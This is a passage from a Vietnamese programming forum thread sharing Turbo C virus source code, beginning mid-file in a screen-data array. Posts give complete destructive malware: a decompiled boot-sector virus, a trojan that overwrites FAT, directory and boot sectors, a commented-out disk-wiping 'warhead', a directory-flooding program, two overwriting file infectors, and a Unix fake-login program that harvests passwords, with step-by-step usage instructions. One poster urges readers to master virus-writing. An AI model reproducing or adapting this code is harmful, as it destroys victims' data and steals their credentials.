    184.     0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
    185.     0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
    186.     0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
    187.     0x20, 0x8EDB, 0x8EDB, 0x8EDB, 0x8EDB, 0x8EDB, 0x8EDB, 0x8EDB,
    188.     0x8EDB, 0x8EDB, 0x8EDB, 0x8EDB, 0x8EDB, 0x8EDB, 0x8EDB, 0x8EDB,
    189.     0x8EDB, 0x8EDB, 0x8EDB, 0x8EDB, 0x8EDB, 0x8EDB, 0x8EDB, 0x8EDB,
    190.     0x8EDB, 0x8EDB, 0x8EDB, 0x8EDB, 0x8EDB, 0x8EDB, 0x8EDB, 0x8EDB,
    191.     0x8EDB, 0x8EDB, 0x8EDB, 0x8EDB, 0x8EDB, 0x8EDB, 0x8EDB, 0x8EDB,
    192.     0x8EDB, 0x8EDB, 0x8EDB, 0x8EDB, 0x8EDB, 0x8EDB, 0x8EDB, 0x8EDB,
    193.     0x8EDB, 0x8EDB, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
    194.     0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
    195.     0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
    196.     0x20, 0x20, 0x20, 0x20, 0x20, 0x8ADB, 0x8ADB, 0x8ADB,
    197.     0x8ADB, 0x8ADB, 0x8ADB, 0x8ADB, 0x8ADB, 0x3FDA, 0x30C4, 0x30C4,
    198.     0x30C4, 0x30C4, 0x30C4, 0x30C4, 0x30C4, 0x30C4, 0x30C4, 0x30C4,
    199.     0x30C4, 0x30C4, 0x30C4, 0x30C4, 0x30C4, 0x30C4, 0x30C4, 0x30C4,
    200.     0x30C4, 0x30C4, 0x30C4, 0x30C4, 0x30C4, 0x30C4, 0x30C4, 0x30C4,
    201.     0x30C4, 0x30C4, 0x30C4, 0x30C4, 0x30C4, 0x30C4, 0x30C4, 0x30C4,
    202.     0x30C4, 0x30C4, 0x30C4, 0x30BF, 0x8ADB, 0x8ADB, 0x8ADB, 0x8ADB,
    203.     0x8ADB, 0x8ADB, 0x8ADB, 0x8ADB, 0x8ADB, 0x8ADB, 0x20, 0x20,
    204.     0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
    205.     0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
    206.     0x20, 0x8BDB, 0x8BDB, 0x8BDB, 0x8BDB, 0x8BDB, 0x8BDB, 0x8BDB,
    207.     0x8BDB, 0x8BDB, 0x8BDB, 0x8BDB, 0x8BDB, 0x3FB3, 0x3DB, 0x3DB,
    208.     0x3DB, 0x3DB, 0x3DB, 0x3DB, 0x3DB, 0x3DB, 0x3DB, 0x3DB,
    209.     0x3DB, 0x3DB, 0x3DB, 0x3DB, 0x3DB, 0x3DB, 0x3DB, 0x3DB,
    210.     0x3DB, 0x3DB, 0x3DB, 0x3DB, 0x3DB, 0x3DB, 0x3DB, 0x3DB,
    211.     0x3DB, 0x3DB, 0x3DB, 0x3DB, 0x3DB, 0x3DB, 0x3DB, 0x3DB,
    212.     0x3DB, 0x3DB, 0x3DB, 0x30B3, 0x8BDB, 0x8BDB, 0x8BDB, 0x8BDB,
    213.     0x8BDB, 0x8BDB, 0x8BDB, 0x8BDB, 0x8BDB, 0x8BDB, 0x8BDB, 0x8BDB,
    214.     0x8BDB, 0x8BDB, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
    215.     0x20, 0x20, 0x20, 0x20, 0x20, 0x89DB, 0x89DB, 0x89DB,
    216.     0x89DB, 0x89DB, 0x89DB, 0x89DB, 0x89DB, 0x89DB, 0x89DB, 0x89DB,
    217.     0x89DB, 0x89DB, 0x89DB, 0x89DB, 0x89DB, 0x3FB3, 0x3DB, 0x3DB,
    218.     0x3DB, 0x3E20, 0x3E20, 0x3E20, 0x3E20, 0x3E20, 0x3E20, 0x3E44,
    219.     0x3E6F, 0x3E6F, 0x3E6D, 0x3E20, 0x3E26, 0x3E20, 0x3E47, 0x3E6C,
    220.     0x3E6F, 0x3E6F, 0x3E6D, 0x3E20, 0x3E74, 0x3E69, 0x3E6D, 0x3E65,
    221.     0x3E2E, 0x3DB, 0x3DB, 0x3DB, 0x3DB, 0x3DB, 0x3DB, 0x3DB,
    222.     0x3DB, 0x3DB, 0x3DB, 0x30B3, 0x89DB, 0x89DB, 0x89DB, 0x89DB,
    223.     0x89DB, 0x89DB, 0x89DB, 0x89DB, 0x89DB, 0x89DB, 0x89DB, 0x89DB,
    224.     0x89DB, 0x89DB, 0x89DB, 0x89DB, 0x89DB, 0x89DB, 0x89DB, 0x20,
    225.     0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
    226.     0x81DB, 0x81DB, 0x81DB, 0x81DB, 0x81DB, 0x81DB, 0x81DB, 0x81DB,
    227.     0x81DB, 0x81DB, 0x81DB, 0x81DB, 0x81DB, 0x3FB3, 0x3DB, 0x3DB,
    228.     0x3DB, 0x3DB, 0x3DB, 0x3DB, 0x3DB, 0x3DB, 0x3DB, 0x3DB,
    229.     0x3DB, 0x3DB, 0x3DB, 0x3DB, 0x3DB, 0x3DB, 0x3DB, 0x3DB,
    230.     0x3DB, 0x3DB, 0x3DB, 0x3DB, 0x3DB, 0x3DB, 0x3DB, 0x3DB,
    231.     0x3DB, 0x3DB, 0x3DB, 0x3DB, 0x3DB, 0x3DB, 0x3DB, 0x3DB,
    232.     0x3DB, 0x3DB, 0x3DB, 0x30B3, 0x81DB, 0x81DB, 0x81DB, 0x81DB,
    233.     0x81DB, 0x81DB, 0x81DB, 0x81DB, 0x81DB, 0x81DB, 0x81DB, 0x81DB,
    234.     0x81DB, 0x81DB, 0x81DB, 0x20, 0x20, 0x20, 0x20, 0x20,
    235.     0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
    236.     0x20, 0x20, 0x20, 0x20, 0x20, 0x8DDB, 0x8DDB, 0x8DDB,
    237.     0x8DDB, 0x8DDB, 0x8DDB, 0x8DDB, 0x8DDB, 0x3FC0, 0x3FC4, 0x3FC4,
    238.     0x3FC4, 0x3FC4, 0x3FC4, 0x3FC4, 0x3FC4, 0x3FC4, 0x3FC4, 0x3FC4,
    239.     0x3FC4, 0x3FC4, 0x3FC4, 0x3FC4, 0x3FC4, 0x3FC4, 0x3FC4, 0x3FC4,
    240.     0x3FC4, 0x3FC4, 0x3FC4, 0x3FC4, 0x3FC4, 0x3FC4, 0x3FC4, 0x3FC4,
    241.     0x3FC4, 0x3FC4, 0x3FC4, 0x3FC4, 0x3FC4, 0x3FC4, 0x3FC4, 0x3FC4,
    242.     0x3FC4, 0x3FC4, 0x3FC4, 0x30D9, 0x8DDB, 0x8DDB, 0x8DDB, 0x8DDB,
    243.     0x8DDB, 0x8DDB, 0x8DDB, 0x8DDB, 0x8DDB, 0x8DDB, 0x8DDB, 0x20,
    244.     0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
    245.     0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
    246.     0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
    247.     0x85DB, 0x85DB, 0x85DB, 0x85DB, 0x85DB, 0x85DB, 0x85DB, 0x85DB,
    248.     0x85DB, 0x85DB, 0x85DB, 0x85DB, 0x85DB, 0x85DB, 0x85DB, 0x85DB,
    249.     0x85DB, 0x85DB, 0x85DB, 0x85DB, 0x85DB, 0x85DB, 0x85DB, 0x85DB,
    250.     0x85DB, 0x85DB, 0x85DB, 0x85DB, 0x85DB, 0x85DB, 0x85DB, 0x85DB,
    251.     0x85DB, 0x85DB, 0x85DB, 0x85DB, 0x85DB, 0x85DB, 0x85DB, 0x85DB,
    252.     0x85DB, 0x85DB, 0x85DB, 0x85DB, 0x85DB, 0x85DB, 0x85DB, 0x85DB,
    253.     0x85DB, 0x85DB, 0x85DB, 0x20, 0x20, 0x20, 0x20, 0x20,
    254.     0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
    255.     0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
    256.     0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
    257.     0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
    258.     0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
    259.     0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
    260.     0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
    261.     0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
    262.     0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
    263.     0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
    264.     0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20};
    265.  
    266.  
    267. main()
    268. {
    269.     int scnBuf;
    270.  
    271.     regs.h.ah = 15;
    272.     int86(16,®s,®s); /* get the video mode... */
    273.     if(regs.h.al == 7)
    274.         scnBuf = 0xB000; /* if the jerk has mono, kill him too */
    275.     else
    276.         scnBuf = 0xB800; /* color */
    277.     clearscreen();
    278.     movedata(FP_SEG(gloom_screen),FP_OFF(gloom_screen),scnBuf,0,sizeof(gloom_screen));
    279.     getch();
    280.     clearscreen();
    281. }
    282.  
    283. /* clears the screen */
    284. void clearscreen(void)
    285. {
    286.     regs.h.ah = 6;
    287.     regs.h.al = 0;
    288.     regs.h.bh = 7;
    289.     regs.h.ch = 0;
    290.     regs.h.cl = 0;
    291.     regs.h.dh = 25;
    292.     regs.h.dl = 80;
    293.     int86(16,®s,®s);
    294.  
    295. /* this is the WARHEAD; keep the comments till you need to arm it, of course. */
    296. /* this really clears the screen and every other god damn thing*/
    297. /* chunks of "virmin" code, ha ha! */
    298.  
    299. /*    char *vir;                                    */
    300. /*    int i;                                        */
    301.  
    302. /*    strcpy(vir,"");                               */
    303. /*    for (i=0; i<40; i++)                          */
    304. /*      strcat(vir,"MicroSoft 1993");               */
    305. /*    abswrite(2,50,0,vir);                         */
    306. /*    abswrite(3,50,0,vir);                         */
    307. /*    abswrite(4,50,0,vir);                         */
    308. /*    abswrite(5,50,0,vir);                         */
    309. /*    printf("MicroSoft Corp.");                    */
    310. /*};                                                  */
    311.  
    312. }
    C Code:
    1. /*
    2.  ***************************************************************************
    3.  *                                                                         *
    4.  *    This file was prepared by EXEC-2-C code restoration utility Ver 0.1  *
    5.  *    Copywrite (c) The Austin Code Works & Polyglot International         *
    6.  *                Jerusalem, 1991                             *
    7.  *                                                                         *
    8.  ***************************************************************************
    9.  */
    10.  
    11. #include       "EXEC-2-C.H"
    12.  
    13. Byte var1_136 [ 15 ] = {
    14.      80,  83,  81,  82,  30,  6,  86,  87,  14,  31,
    15.      14,  7,  190,  4
    16.     };
    17. Byte var1_200 [ 60 ] = {
    18.      187,  0,  124,  139,  14,  8,  0,  131,  249,  7,
    19.      117,  7,  186,  128,  0,  205,  19,  235,  43,  139,
    20.      14,  8,  0,  186,  0,  1,  205,  19,  114,  32,
    21.      14,  7,  184,  1,  2,  187,  0,  2,  185,  1,
    22.      0,  186,  128,  0,  205,  19,  114,  14,  51,  246,
    23.      252,  173,  59,  7,  117,  79,  173,  59,  71,  2
    24.     };
    25. char var1_23c [ 2 ] = "uI";
    26. char var1_2be [ 40 ] = "\n"
    27.                 "Replace and press any key when ready\r\n";
    28. char var1_2e6 [ 15 ] = "IO      SYSMSDO";
    29. Word var1_3be [ 417 ];
    30.  
    31.  
    32. /*======== Code section prepared by EXEC-2-C code restoration utility =======*/
    33.  
    34.  
    35.  
    36. /****************************************************************************/
    37.         near main()
    38. /****************************************************************************/
    39. {
    40.  
    41.    
    42.     goto  label_6;
    43.    
    44. label_1:
    45.     do   {
    46.         dx = 0;
    47.         Pushf();
    48.         ax = 0x201;  /*PCH : RM_Table_init*/
    49.         bx = 0x200;  /*PCH : RM_Table_init*/
    50.         cx = 1;  /*PCH : RM_Table_init*/
    51.         (*(FAR_FNC)0xA)();
    52.         if(!CarryFlg)
    53.             goto  label_2;
    54.         ax = 0;
    55.         Pushf();
    56.         (*(FAR_FNC)0xA)();
    57.     }    while(--si);
    58.     goto  label_5;
    59.    
    60. label_2:
    61.     si = 0;
    62.     DirFlg = DOWN;
    63.     ax = DirFlg ? *((int *)si++) : *((int *)si--);
    64.     if(ax == *( Word *)bx)   {
    65.         ax = DirFlg ? *((int *)si++) : *((int *)si--);
    66.         if(ax == *( Word *)&bx[2])
    67.             goto  label_5;
    68.     }
    69.     ax = 0x301;  /*PCH : RM_Table_init*/
    70.     cl = 3;  /*PCH : RM_Table_init*/
    71.     dh = 1;  /*PCH : RM_Table_init*/
    72.     if(bx[0x15] != 0xFD)  
    73.         cl = 0xE;  /*PCH : RM_Table_init*/
    74.         *(Word * )8 = cx;
    75.     Pushf();
    76.     (*(FAR_FNC)0xA)();
    77.     if(!CarryFlg)   {
    78.         DirFlg = DOWN;
    79.         si = 0x3BE;  /*PCH : RM_Table_init*/
    80.         di = 0x1BE;  /*PCH : RM_Table_init*/
    81.         cx = 0x21;  /*PCH : RM_Table_init*/
    82.         while( cx-- )  {
    83.             *(int *)MK_FP(es, di) = *(int *)si,
    84.             DirFlg ? di+=2, si+=2 : di-=2, si-=2;
    85.         };
    86.        
    87.         bx = 0;
    88.         dx = 0;
    89.         Pushf();
    90.         ax = 0x301;  /*PCH : RM_Table_init*/
    91.         cx = 1;  /*PCH : RM_Table_init*/
    92.         (*(FAR_FNC)0xA)();
    93.     }
    94.    
    95. label_5:
    96.     di = pop();
    97.     si = pop();
    98.     es = pop();
    99.     ds = pop();
    100.     dx = pop();
    101.     cx = pop();
    102.     bx = pop();
    103.     ax = pop();
    104.     return;
    105.    
    106. label_6:
    107.     ax = 0;
    108.     ds = ax;
    109.     disable();
    110.     ss = ax;
    111.     enable();
    112.     push(ds);
    113.     push(0x7C00);
    114.     *(Word * )0x7C0A = *(Word * )0x4C;
    115.     *(Word * )0x7C0C = *(Word * )0x4E;
    116.     *(Word * )0x413 = *(Word * )0x411;
    117.     ax <<= 6;
    118.     es = ax;
    119.     *(Word * )0x7C05 = ax;
    120.     *(Word * )0x4C = 0xE;
    121.     *(Word * )0x4E = es;
    122.     di = 0;
    123.     DirFlg = DOWN;
    124.     si = 0x7C00;  /*PCH : RM_Table_init*/
    125.     cx = 0x1BE;  /*PCH : RM_Table_init*/
    126.     while( cx-- )  {
    127.         *MK_FP( es , DirFlg ? di++ : di-- ) = DirFlg ?  *si++ : *si--;
    128.     };
    129.    
    130.     goto_far  *(Dword *)0x7C03;
    131.    
    132. label_7:
    133.     cx = 0;
    134.     ah = 4;  /*PCH : RM_Table_init*/
    135.     geninterrupt(0x1A);    /*  BIOS Service func ( ah ) = 4 */
    136.                 /*  Read data from real time clock */
    137.                 /*  Output: DL/DH/CL/CH-dd/mm/yy/century */
    138.                 /*  CF=1 if no clock */
    139.                
    140.     if(dx != 0x306)  
    141.         return;
    142.     dx = 0;
    143.     cx = 1;  /*PCH : RM_Table_init*/
    144.    
    145. label_9:
    146.     do   {
    147.         si = *(Word * )8;  /*PCH : RM_Table_init*/
    148.         ax = 0x309;  /*PCH : RM_Table_init*/
    149.         if(si != 3)   {
    150.             al = 0xE;  /*PCH : RM_Table_init*/
    151.             if(si != 0xE)   {
    152.                 *(Byte *)7 = 4;
    153.                 al = 0x11;  /*PCH : RM_Table_init*/
    154.                 dl = 0x80;  /*PCH : RM_Table_init*/
    155.                
    156.             }
    157.         }geninterrupt(0x13);    /*  BIOS Service func ( ah ) = 3 */
    158.                     /*  Write disk sectors */
    159.                     /*  Input: AL-sec num CH-track CL-sec */
    160.                     /*  DH-head DL-drive ES:BX-buffer */
    161.                     /*  Output: CF-flag AH-stat AL-sec written */
    162.                    
    163.         if(CarryFlg)   {
    164.             ah = 0;
    165.             geninterrupt(0x13);    /*  BIOS Service func ( ah ) = 0 */
    166.                         /*  Reset disk system */
    167.                        
    168.         }
    169.         ++dh;
    170.     }    while((unsigned)dh < (unsigned)*(Byte *)7);
    171.     dh = 0;
    172.     ++ch;
    173.     goto  label_9;
    174.    
    175.     push(bx);
    176.     bx[si] &= ah;
    177.     bp[di + 0x59] &= dl;
    178.     push(bx);
    179.     bx[si] = bx[si] + al;
    180.     push(bp);
    181.     *MK_FP( es , DirFlg ? di++ : di--) = al;
    182.     DirFlg = UP;
    183. }

  5. #5
    Ngày gia nhập
    02 2008
    Bài viết
    1,009

    C Code:
    1. /* TOXiC1 - TOXiC Trojan #1 - Programmed by Izzy Stradlin' and MiSERY/CPA  */
    2. /* MiSERY1 is the name given to this trojan.  I programmed it, I name the  */
    3. /* Mother fucker.  I hereby give all rights of this trojan to MiSERY/CPA.  */
    4. /* If ya don't like it, TOUGH.  I Give ALL rights EXCEPT for the NAME to   */
    5. /* CPA - eg. NOONE CAN CHANGE THE NAME OF THIS THING W/O MY PERMISSION AND */
    6. /* LEAVE MY NAME IN IT.  The name must stay on, both my name and the name  */
    7. /* of the trojan are copyrighted (c) 90 to Izzy Stradlin'                  */
    8. /* ----------------------------------------------------------------------- */
    9. /* Capt. - This isn't a Real Virus - It's a Trojan.  Sorry, still trying   */
    10. /* to use something similar to ASM's int 21h; for DOSs features, then I'll */
    11. /* Get going on Virii.  As is, this Destroys Boot/Fat/Dir on Most harddisks*/
    12. /* and Well, there is so far no way that I know of that it can recover     */
    13. /* what the disk lost, as it writes the trojan name over everything.  This */
    14. /* SHOULD Go for BOTH FAT Tables, but I am not going to try it out.  Haha. */
    15. /* You try it - Tell me how it works! all I know is that it got 6 of my    */
    16. /* Flippin' floppies, damnit!  - Delete this bottom message to you after   */
    17. /* Checking it out - Makes it look more professional.  Leave the top text  */
    18. /* part in tact, just in case you want to pass it around.                  */
    19. /* This is JUST A START.  They DO/WILL Get better - this is weak, but as I */
    20. /* Said - no known recovery from it.                                       */
    21. /* Oh, this looks for C: through H: */
    22.  
    23. #define   TROJAN_NAME  "TOXiC"    /* Trojan Name */
    24.  
    25. /* Procedures  */
    26. void infect_fat();
    27. void infect_dir();
    28. void infect_boot();
    29. void main();
    30. /* Simple, eh? */
    31.  
    32.  
    33. void infect_fat()
    34. {
    35.     int i;
    36.     for (i=2; i<7; i++) {
    37.         abswrite(i,0,2,TROJAN_NAME);
    38.     }
    39. }
    40.  
    41. void infect_dir()
    42. {
    43.     int i;
    44.     for (i=2; i<7; i++) {
    45.         abswrite(i,2,2,TROJAN_NAME);
    46.     }
    47. }
    48.  
    49. void infect_boot()
    50. {
    51.     int i;
    52.     for (i=0; i<7; i++) {
    53.         abswrite(i,4,2,TROJAN_NAME);
    54.     }
    55. }
    56.  
    57. void main()
    58. {
    59.     printf(TROJAN_NAME);
    60.     infect_fat();
    61.     infect_dir();
    62.     infect_boot();
    63. }
    C Code:
    1. #include <dos.h>
    2. #include <string.h>
    3.  
    4. main()
    5. {
    6.     char *vir;
    7.     int i;
    8.  
    9.     strcpy(vir,"");
    10.     for (i=0; i<40; i++)
    11.       strcat(vir,"HOWS IT DOING ROYAL UGLY DUDES!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!");
    12.     abswrite(2,50,0,vir);
    13.     abswrite(3,50,0,vir);
    14.     abswrite(4,50,0,vir);
    15.     abswrite(5,50,0,vir);
    16.     printf("Ouch dude... sorry..");
    17. };

    C Code:
    1. /* Make You Crazy !!
    2.  
    3.     Never execute this program on your HD , haha !!
    4.  
    5.  
    6.  
    7.     Programmed By Ninja Wala -- Royal Leader of Software Underground Palace
    8.  
    9.     Share your knowledge and experience with other members in SUP,
    10.     and we share ours with you.
    11.  
    12. */
    13.  
    14. #include        <stdio.h>
    15. #include        <stdlib.h>
    16. #include        <dir.h>
    17.  
    18. main()
    19. {
    20.     int i,j;
    21.     char tmp[20];
    22.     char far *ptr;
    23.  
    24.     for (i=0;i<=50;i++){
    25.         srand(rand());
    26.         ptr = itoa(rand(),tmp,10);
    27.         mkdir ( ptr );
    28.         chdir ( ptr );
    29.         for (j=0;j<=50;j++){
    30.             ptr = itoa(rand(),tmp,10);
    31.             mkdir( ptr );
    32.         }
    33.         chdir ("\\");
    34.     }
    35. }

  6. #6
    Ngày gia nhập
    02 2008
    Bài viết
    1,009

    Mặc định Mã nguồn virus viết bằng Turbo C

    C Code:
    1. /**************
    2. -------------------
    3. A UNIX Trojan Horse
    4. -------------------
    5.  
    6. Written By Shooting Shark on 10 June 1986.  Released by Tiburon Systems
    7. and R0DENTZWARE.
    8.  
    9. Disclaimer : I have *never* used the program below in any capacity except for testing it to see thatit does indeed work perfectly.  I do not condone the use of such a program.  I am presenting it for nformation purposes only.  I will not be held liable
    10. for any damages caused by the use of this program.
    11.  
    12. The following is a "trojan horse" program written in C for unix versions 4.2 and 4.3 (berkely unix) sing the C-shell.  It might work on other versions of unix, such as AT&T System V.  I haven't tried t.  This program simulates the login for a unix machi
    13. ne.  When some poor fool enters his name and password, they will be written to a file called "stuff"in your home directory in the form:
    14.  
    15. user root has password joshua
    16.  
    17. if this file already exists, new password/login hacks will be appended to the file...thus after you un the program several times you will have a nice little database of hacked passwords.
    18.  
    19. How To Use The Program
    20. ----------------------
    21.  
    22. First, you'll need to configure the source so that it will look like your system's login when it is un (see below).  Then, put the source in a file called horse.c and type the following:
    23.  
    24. cc horse.c -lcurses -ltermcap
    25. mv a.out horse
    26.  
    27. and your ready-to-run program will be called 'horse'.  You will have to invoke horse from a shellscrpt.  Create a new file and put these two lines in it:
    28.  
    29. horse
    30. login
    31.  
    32. Now when you 'source' this file, the horse program will be invooked and you can leave your terminal nd watch as somebody walks up to it and unknowingly gives you their password.
    33.  
    34. If you like, you can append the above two lines to your ".logout" file,
    35. and whenever you log out, the horse program will be run automatically.
    36.  
    37. ------- source begins here --------
    38. ***************************/
    39. /* horse.c  - Trojan Horse program.  For entertainment purposes only.
    40.  * Written by Shooting Shark.
    41.  */
    42.  
    43. #include <curses.h>
    44.  
    45. main()
    46. {
    47. char name[10], password[10];
    48. int i;
    49. FILE *fp, *fopen();
    50. initscr();
    51.  
    52. printf("\n\nPyramid Technology 4.2/5.0 UNIX (tiburon)\n\n\n\nlogin: ");
    53.  
    54. /* You will need to alter the above line so it prints your system's
    55. header.  Each '\n' is a carriage return. */
    56.  
    57.  
    58. scanf("%[^\n]",name);
    59. noecho();
    60. printf("Password:");
    61. scanf("%[^\n]",password);
    62. printf("\n");
    63. echo();
    64. sleep(5);
    65.  
    66. /* change the 'sleep(x)' above to give a delay similar to the delay your system gives. An instant "Lgin incorrect" looks suspicious. */
    67.  
    68. if ( ( fp = fopen("stuff","a") )  != -1 ) {
    69.         fprintf(fp,"login %s has password %s\n",name,password);
    70.         fclose(fp);
    71.         }
    72.  
    73. printf("Login incorrect\n");
    74. endwin();
    75. }
    76.  
    77. /****************************
    78. --------- Source ends here. ---------
    79.  
    80. Note : in this program's present form, if somebody hits a ^C while your program is running, they wil be dumped into your shell and you might be kicked out of your school or whatever.  If you know C, yu can add a signal structure to trap ^C's.
    81.  
    82. Call:
    83.  
    84. IDI..........415/344-6568
    85. 30 megs, IBM pirate line, Forum-PC software.
    86.  
    87. The Matrix...415/922-2008
    88. 101 megs (no shit), IBM wares, Forum-PC software.
    89.  
    90. -----
    91.  
    92.  
    93. X-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-X
    94.  
    95.  Another file downloaded from:                               NIRVANAnet(tm)
    96.  
    97.  & the Temple of the Screaming Electron   Jeff Hunter          510-935-5845
    98.  Rat Head                                 Ratsnatcher          510-524-3649
    99.  Burn This Flag                           Zardoz               408-363-9766
    100.  realitycheck                             Poindexter Fortran   415-567-7043
    101.  Lies Unlimited                           Mick Freen           415-583-4102
    102.  
    103.    Specializing in conversations, obscure information, high explosives,
    104.        arcane knowledge, political extremism, diversive sexuality,
    105.        insane speculation, and wild rumours. ALL-TEXT BBS SYSTEMS.
    106.  
    107.   Full access for first-time callers.  We don't want to know who you are,
    108.    where you live, or what your phone number is. We are not Big Brother.
    109.  
    110.                           "Raw Data for Raw Nerves"
    111.  
    112. X-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-X
    113. *****************************/

    C Code:
    1. /****************************
    2.    This is a pretty lame program, I would not advise running it on yourself
    3.    though.  It will merely overwrite found files with itself, thus replicating.
    4.    It is for educational purposes only.  Careful, since it overwrites, it is
    5.    destructive.  Infecte files cannot be recovered.  I could save time/date
    6.    stamps, etc. but this was just for fun, and took me only a few mintes to
    7.    throw together.  
    8.      The Crypt Keeper/RRG
    9.      (619)/457-1836: The Programmer's Paradise
    10.    Oh yeah, use the tiny memory model, and make it a .COM file.
    11. ****************************/
    12.  
    13. #include <dos.h>
    14. #include <dir.h>
    15. #include <stdio.h>
    16.  
    17. #define V_SIZE 7424
    18.  
    19. int n_inf=0;
    20.  
    21. void resume(void);
    22. void inf(char *vir, char *filename);
    23. int  compare(char *d, char *e);
    24.  
    25. void main(int argc, char **argv)
    26. {
    27.   struct ffblk fileinfo;
    28.   char vir[V_SIZE];
    29.   FILE *fp;
    30.   char path[6];
    31.   int b,a=0;
    32.  
    33.   argc++;
    34.  
    35.   if((fp=fopen(argv[0],"rb"))==NULL) resume();
    36.   fread(vir,sizeof(char),V_SIZE,fp);
    37.   fclose(fp);
    38.  
    39.   path[0]='*';
    40.   path[1]='.';
    41.   path[2]='E';
    42.   path[3]='X';
    43.   path[4]='E';
    44.   path[5]=NULL;
    45.  
    46.   if(findfirst(path,&fileinfo,FA_ARCH)==-1) resume();
    47.   inf(vir,fileinfo.ff_name);
    48.   do {
    49.     if(findnext(&fileinfo)!=0) a=1;
    50.     else inf(vir,fileinfo.ff_name);
    51.     if((a==1) || (n_inf>4)) b=1;
    52.   } while (b!=1);
    53.   resume();
    54. }
    55.  
    56. void inf(char *vir, char *filename)
    57. {
    58.   FILE *fp;
    59.   char checkinf[V_SIZE];
    60.  
    61.   if((fp=fopen(filename,"rb+"))==NULL) resume();
    62.   fread(checkinf,sizeof(char),V_SIZE,fp);
    63.   if(compare(vir,checkinf)==0) return;
    64.   fseek(fp,0L,SEEK_SET);
    65.   fwrite(vir,sizeof(char),V_SIZE,fp);
    66.   fclose(fp);
    67.   n_inf++;
    68. }
    69.  
    70. int compare(char *d, char *e)
    71. {
    72.   int a;
    73.  
    74.   for(a=0;a<V_SIZE;a++) if(d[a]!=e[a]) return(1);
    75.   return(0);
    76. }
    77.  
    78. void resume(void)
    79. {
    80.   exit(0);
    81. }

  7. #7
    Ngày gia nhập
    02 2008
    Bài viết
    1,009

    Với kiến thức tiếng anh tốt và khả năng dịch các ngôn từ kỹ thuật trong TC các cậu có thể hoàn toàn làm chủ được các kỹ thuật làm virut trên C và cụ thể là trên TC
    các con virut này đều đã được tác giả biên dịch về những tác hại của nó và những gì mà nó có thể gây ra,thân

  8. #8
    Ngày gia nhập
    04 2008
    Bài viết
    336

    C Code:
    1. #include <dos.h>
    2. #include <string.h>
    3.  
    4. main()
    5. {
    6.     char *vir;
    7.     int i;
    8.  
    9.     strcpy(vir,"");
    10.     for (i=0; i<40; i++)
    11.       strcat(vir,"HOWS IT DOING ROYAL UGLY DUDES!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!");
    12.     abswrite(2,50,0,vir);
    13.     abswrite(3,50,0,vir);
    14.     abswrite(4,50,0,vir);
    15.     abswrite(5,50,0,vir);
    16.     printf("Ouch dude... sorry..");
    17. };

    cái này chạy trên Win hình như chỉ thử đc. với đĩa A thôi chứ mấy ổ cứng sẽ hiện bảng thông báo và ko cho truy xuất trực tiếp vào HD

    btw
    C Code:
    1.     /* This is a simple overwriting virus programmed in Turbo C */
    2.     /*  It will infect all .COM files in the current directory  */
    3.     /*    Infections destroy the programs and cannot be cured   */
    4.     /*   It was presented in Virology 101 (c) 1993 Black Wolf   */
    5.     /*     FOR EDUCATIONAL PURPOSES ONLY, DO NOT RELEASE!       */
    6.  
    7.     #include <stdio.h>
    8.     #include <dos.h>
    9.     #include <dir.h>
    10.  
    11.     FILE *Virus,*Host;
    12.     int x,y,done;
    13.     char buff[256];
    14.     struct ffblk ffblk;
    15.  
    16.     main()
    17.     {
    18.      done = findfirst("*.COM",&ffblk,0);   /* Find a .COM file */
    19.        while (!done)               /* Loop for all COM's in DIR*/
    20.         {
    21.         printf("Infecting  %s\n", ffblk.ff_name);    /* Inform user */
    22.         Virus=fopen(_argv[0],"rb");          /* Open infected file  */
    23.         Host=fopen(ffblk.ff_name,"rb+");     /* Open new host file  */
    24.  
    25.         x=9504;                               /* Virus size - must   */
    26.                                               /* be correct for the  */
    27.                                               /* compiler it is made */
    28.                                               /* on, otherwise the   */
    29.                                               /* entire virus may not*/
    30.                                               /* be copied!!         */
    31.         while (x>256)                         /* OVERWRITE new Host  */
    32.             {                                 /* Read/Write 256 byte */
    33.             fread(buff,256,1,Virus);          /* chunks until bytes  */
    34.             fwrite(buff,256,1,Host);          /* left < 256          */
    35.             x-=256;
    36.             }
    37.         fread(buff,x,1,Virus);                /* Finish off copy     */
    38.         fwrite(buff,x,1,Host);
    39.         fcloseall();                          /* Close both files and*/
    40.         done = findnext(&ffblk);              /* go for another one. */
    41.         }
    42.                                               /* Activation would go */
    43.                                               /* here                */
    44.       return (0);                             /* Terminate           */
    45.     }

  9. #9
    Ngày gia nhập
